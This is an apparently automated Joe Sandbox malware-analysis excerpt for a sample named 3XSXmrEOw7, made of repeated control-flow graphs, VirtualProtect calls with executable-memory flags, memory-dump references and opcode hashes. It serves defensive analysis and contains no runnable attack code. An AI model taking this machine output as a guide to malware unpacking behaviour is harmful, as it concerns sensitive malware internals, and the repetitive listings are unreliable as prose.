                                                                                                                                              • Instruction Fuzzy Hash: 3DE146B2C042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68BA7

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 369 407f65-407f8f 371 407f95-407fa2 369->371 372 40801d-408068 369->372 371->372 375 407fa4-408018 call 407fbb 371->375 373 408079-4080ca call 408098 372->373 374 40806a-408074 372->374 390 4080d8-4080fd call 4080fe 373->390 391 4080cc-4080d6 373->391 378 408114-40811b 374->378 392 407f78-40800d 375->392 381 40815d 378->381 382 40811d-40815b 378->382 386 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 381->386 382->386 416 408828-408a77 call 4089ff 386->416 417 4094b9-4095cb call 4094db call 40950b call 4095cc 386->417 391->378 398 408016 392->398 399 40800f 392->399 398->372 399->392 433 408a79-408ab5 416->433 434 408aba-408ae7 call 408ae8 416->434 447 409f60-409f62 ExitProcess 417->447 443 408e4f-408e56 433->443 434->443 444 408e58-408e94 443->444 445 408e99-408ecf call 408ed1 443->445 444->447 445->447
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                                              • Instruction ID: f40b09c2810a9fa6f02b2eec4802a077c4c1291dc3e09875bf3ed72bb553ef21
                                                                                                                                              • Opcode Fuzzy Hash: 2fe339eb59fc586c2937a91252676beb4543a3d4f9bdffa9c775f95e98139192
                                                                                                                                              • Instruction Fuzzy Hash: 8EE135B1C042649AF7208624DC447EB7A79DF51314F1440FED98DA62C1DABE0FC68B67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 452 406e30-406e4d 453 406e52-406ece call 406e68 452->453 459 406ed0-406ee0 453->459 460 406ee5-406eef 453->460 465 406f68-406f6f 459->465 461 406ef5-406f02 460->461 462 406dde-406e4d 460->462 461->462 464 406f08-406f1f call 406f1b 461->464 462->453 466 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 464->466 476 406f21-406f44 464->476 465->466 467 406fb4-406fcb call 406fd0 465->467 499 408828-408a77 call 4089ff 466->499 500 4094b9-4095cb call 4094db call 40950b call 4095cc 466->500 480 406f52 476->480 481 406f46-406f50 476->481 482 406f5c-406f62 480->482 481->482 482->465 516 408a79-408ab5 499->516 517 408aba-408ae7 call 408ae8 499->517 530 409f60-409f62 ExitProcess 500->530 526 408e4f-408e56 516->526 517->526 527 408e58-408e94 526->527 528 408e99-408ecf call 408ed1 526->528 527->530 528->530
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                                              • Instruction ID: 220cd9281a29cea94c4a91926213e167e5dbe57d70c329742c206d8b20fd43a8
                                                                                                                                              • Opcode Fuzzy Hash: e76747aa6b57113d2716c669ea92c047467e31ea4db9a62e7ffb1e10252d0d64
                                                                                                                                              • Instruction Fuzzy Hash: E1E125A2C042649AF7208624DC44BEB7A78EF50314F1440FED94DA62C1D6BE5FC6CBA7

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 535 406e40-406e4d 536 406e52-406ece call 406e68 535->536 542 406ed0-406ee0 536->542 543 406ee5-406eef 536->543 548 406f68-406f6f 542->548 544 406ef5-406f02 543->544 545 406dde-406e4d 543->545 544->545 547 406f08-406f1f call 406f1b 544->547 545->536 549 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 547->549 559 406f21-406f44 547->559 548->549 550 406fb4-406fcb call 406fd0 548->550 582 408828-408a77 call 4089ff 549->582 583 4094b9-4095cb call 4094db call 40950b call 4095cc 549->583 563 406f52 559->563 564 406f46-406f50 559->564 565 406f5c-406f62 563->565 564->565 565->548 599 408a79-408ab5 582->599 600 408aba-408ae7 call 408ae8 582->600 613 409f60-409f62 ExitProcess 583->613 609 408e4f-408e56 599->609 600->609 610 408e58-408e94 609->610 611 408e99-408ecf call 408ed1 609->611 610->613 611->613
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 0-3687113455
                                                                                                                                              • Opcode ID: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                                              • Instruction ID: 922c944672f40ff5276d803d9d834a580e9c1310f30415da19b8596a71a819f2
                                                                                                                                              • Opcode Fuzzy Hash: 38b9c65dbf6283e9cc1faf9955d89fe7368ed5d215a0d58d7d950dcf7ce02bd7
                                                                                                                                              • Instruction Fuzzy Hash: 44E123A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 618 406e50-406e5d 619 406e60-406ece 618->619 622 406ed0-406ee0 619->622 623 406ee5-406eef 619->623 629 406f68-406f6f 622->629 624 406ef5-406f02 623->624 625 406dde-406e5d call 406e68 623->625 624->625 627 406f08-406f1f call 406f1b 624->627 625->619 630 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 627->630 642 406f21-406f44 627->642 629->630 631 406fb4-406fcb call 406fd0 629->631 665 408828-408a77 call 4089ff 630->665 666 4094b9-4095cb call 4094db call 40950b call 4095cc 630->666 646 406f52 642->646 647 406f46-406f50 642->647 648 406f5c-406f62 646->648 647->648 648->629 682 408a79-408ab5 665->682 683 408aba-408ae7 call 408ae8 665->683 696 409f60-409f62 ExitProcess 666->696 692 408e4f-408e56 682->692 683->692 693 408e58-408e94 692->693 694 408e99-408ecf call 408ed1 692->694 693->696 694->696
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                                              • Instruction ID: f472c5bf6cce1d32c270796867ad13836725e5baa778bd72db952dc4fd989fbb
                                                                                                                                              • Opcode Fuzzy Hash: a1c9d9ecc7b5141984307abe64710c3eb2a70715d632bebb7b06ef5f539f95a0
                                                                                                                                              • Instruction Fuzzy Hash: B9E134A2C082649AF7208624DC44BEB7A78EF51314F1440FED94DA62C1D6BE5FC6CB67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 701 407500-407524 702 407535-407586 701->702 703 407526-407530 701->703 712 407594-4075c6 call 4075b5 702->712 713 407588 702->713 704 4075d0-4075d7 703->704 706 407619 704->706 707 4075d9-407631 704->707 706->706 718 4076d3-407714 call 407716 707->718 719 407637-407690 707->719 712->704 713->712 719->718 725 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 719->725 751 408828-408a77 call 4089ff 725->751 752 4094b9-4095cb call 4094db call 40950b call 4095cc 725->752 768 408a79-408ab5 751->768 769 408aba-408ae7 call 408ae8 751->769 782 409f60-409f62 ExitProcess 752->782 778 408e4f-408e56 768->778 769->778 779 408e58-408e94 778->779 780 408e99-408ecf call 408ed1 778->780 779->782 780->782
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                                              • Instruction ID: 08101456153ba46f1365cff4e30746e8e286d4fed58f6373a9dfc3cd762e9e30
                                                                                                                                              • Opcode Fuzzy Hash: 636b56e18b7d4412ab0a9b9136e29d628baca83dc62632dedea95a0b5513a5e3
                                                                                                                                              • Instruction Fuzzy Hash: 32E133B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 787 407c35-407c4f 789 407c51-407c8f 787->789 790 407c94-407ca6 787->790 794 40816e-408822 VirtualProtect call 40838a call 4083a8 call 40841d 789->794 792 407ca8-407cb4 790->792 793 407cb9-407d0a call 407ce7 790->793 792->794 799 407d0c-407d4a 793->799 800 407d4f-407d90 793->800 827 408828-408a77 call 4089ff 794->827 828 4094b9-4095cb call 4094db call 40950b call 4095cc 794->828 799->794 806 407d92-407dd0 800->806 807 407dd5-407e99 800->807 806->794 812 408162-408168 807->812 813 407e9f-407eb5 call 407eb6 807->813 812->794 813->812 844 408a79-408ab5 827->844 845 408aba-408ae7 call 408ae8 827->845 858 409f60-409f62 ExitProcess 828->858 854 408e4f-408e56 844->854 845->854 855 408e58-408e94 854->855 856 408e99-408ecf call 408ed1 854->856 855->858 856->858
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                                              • Instruction ID: cf000f9f2d6c84c8d3ce0dac07b7f877c0778feaaefee545d6c19c651e8d1ed7
                                                                                                                                              • Opcode Fuzzy Hash: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                                              • Instruction Fuzzy Hash: F0E114B2D082689AF7208624DC44BEB7A68EF51314F1440FED94D67281D6BE1FC58BA7

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                                              • Instruction ID: ea58bfbc0dd8c397f22414f43d59e966c6f640d547af9d12bb140abd4150adc7
                                                                                                                                              • Opcode Fuzzy Hash: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                                              • Instruction Fuzzy Hash: 08D123B2D082649AF7208624DC44BEB7A69DF50314F1440FED94D662C1DABE1FC68B67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 936 4075c0-4075d7 938 407619 936->938 939 4075d9-407631 936->939 938->938 944 4076d3-407714 call 407716 939->944 945 407637-407690 939->945 945->944 950 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 945->950 976 408828-408a77 call 4089ff 950->976 977 4094b9-4095cb call 4094db call 40950b call 4095cc 950->977 993 408a79-408ab5 976->993 994 408aba-408ae7 call 408ae8 976->994 1007 409f60-409f62 ExitProcess 977->1007 1003 408e4f-408e56 993->1003 994->1003 1004 408e58-408e94 1003->1004 1005 408e99-408ecf call 408ed1 1003->1005 1004->1007 1005->1007
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                                              • Instruction ID: c3c9fe27aa97eefe4607321597f7646c91d95a2a7d095fabcd85beefab367c0e
                                                                                                                                              • Opcode Fuzzy Hash: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                                              • Instruction Fuzzy Hash: AAD135B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1080 4075e0-407631 1083 4076d3-407714 call 407716 1080->1083 1084 407637-407690 1080->1084 1084->1083 1089 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 1084->1089 1115 408828-408a77 call 4089ff 1089->1115 1116 4094b9-4095cb call 4094db call 40950b call 4095cc 1089->1116 1132 408a79-408ab5 1115->1132 1133 408aba-408ae7 call 408ae8 1115->1133 1146 409f60-409f62 ExitProcess 1116->1146 1142 408e4f-408e56 1132->1142 1133->1142 1143 408e58-408e94 1142->1143 1144 408e99-408ecf call 408ed1 1142->1144 1143->1146 1144->1146
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                                              • Instruction ID: ba5505202cf962745bbe92fa0db4f2cdf567307ff8a9c8f7b4a3d42c12a6f098
                                                                                                                                              • Opcode Fuzzy Hash: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                                              • Instruction Fuzzy Hash: 6ED134B2C082649AF7208624DC447EB7A69DF51314F0840FED98D662C1DABE1FC6CB67

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1012 406f0b-406f1f 1013 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 1012->1013 1014 406f21-406f44 1012->1014 1044 408828-408a77 call 4089ff 1013->1044 1045 4094b9-4095cb call 4094db call 40950b call 4095cc 1013->1045 1018 406f52 1014->1018 1019 406f46-406f50 1014->1019 1020 406f5c-406f6f 1018->1020 1019->1020 1020->1013 1024 406fb4-406fcb call 406fd0 1020->1024 1061 408a79-408ab5 1044->1061 1062 408aba-408ae7 call 408ae8 1044->1062 1075 409f60-409f62 ExitProcess 1045->1075 1071 408e4f-408e56 1061->1071 1062->1071 1072 408e58-408e94 1071->1072 1073 408e99-408ecf call 408ed1 1071->1073 1072->1075 1073->1075
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                                              • Instruction ID: 16e97a4dc2b1b72941229be2b9302e60e6d9b11039a76407f9f1745cf537d380
                                                                                                                                              • Opcode Fuzzy Hash: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                                              • Instruction Fuzzy Hash: 13D125A2C082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                                              • Instruction ID: e00debdacd192d099ab58c28448140415868ac13b88858dbeb5059bbadf96c13
                                                                                                                                              • Opcode Fuzzy Hash: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                                              • Instruction Fuzzy Hash: EBD127A2D082649AF7208624DC44BEB7A69DB51310F1440FED94DA72C1D6BE1FC6CBA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                                              • Instruction ID: 2b20349ff3622c334264f6a588594712d4e80cc894e6c7ba1984c525794e84a0
                                                                                                                                              • Opcode Fuzzy Hash: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                                              • Instruction Fuzzy Hash: 1BD134B2C082649AF7208624DC447EB7A69DF50314F0440FED98D662C1DABE5FC6CB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                                              • Instruction ID: 5bf602528398837073a20d5b518e155b67223abd0f1d5e59e04288b574140e96
                                                                                                                                              • Opcode Fuzzy Hash: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                                              • Instruction Fuzzy Hash: 22D136A2D082649AF7208624DC447EB7A69DF51314F0440FED94D672C1DABE1FC6CBA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                                              • Instruction ID: cb57e4122a001d9a5aea0e5eb30d6428f4d9882cba75bea230fd897a336bee3d
                                                                                                                                              • Opcode Fuzzy Hash: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                                              • Instruction Fuzzy Hash: E6D135A2D082649AF7208624DC447EB7A69DF51310F0440FED98D672C1DABE1FC6CBA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                                              • Instruction ID: de9717e0791dd079f802cc80978fd1fc09d249abcbc8c2fa0664e0f4ee9ea232
                                                                                                                                              • Opcode Fuzzy Hash: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                                              • Instruction Fuzzy Hash: DCD136A2D082649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                                              • Instruction ID: 0aac46a3f7d70648d6f49242e283d0af4f9a7a282a53a1faa8e93d764a905c88
                                                                                                                                              • Opcode Fuzzy Hash: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                                              • Instruction Fuzzy Hash: 3FD126E2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                                              • Instruction ID: c42c67ffbe9c770f0b4030029c86904fbf9cde12d90d93a0a162ff4bceb9b38a
                                                                                                                                              • Opcode Fuzzy Hash: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                                              • Instruction Fuzzy Hash: 56D127E2C082649AF7208624EC447EB7A79EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
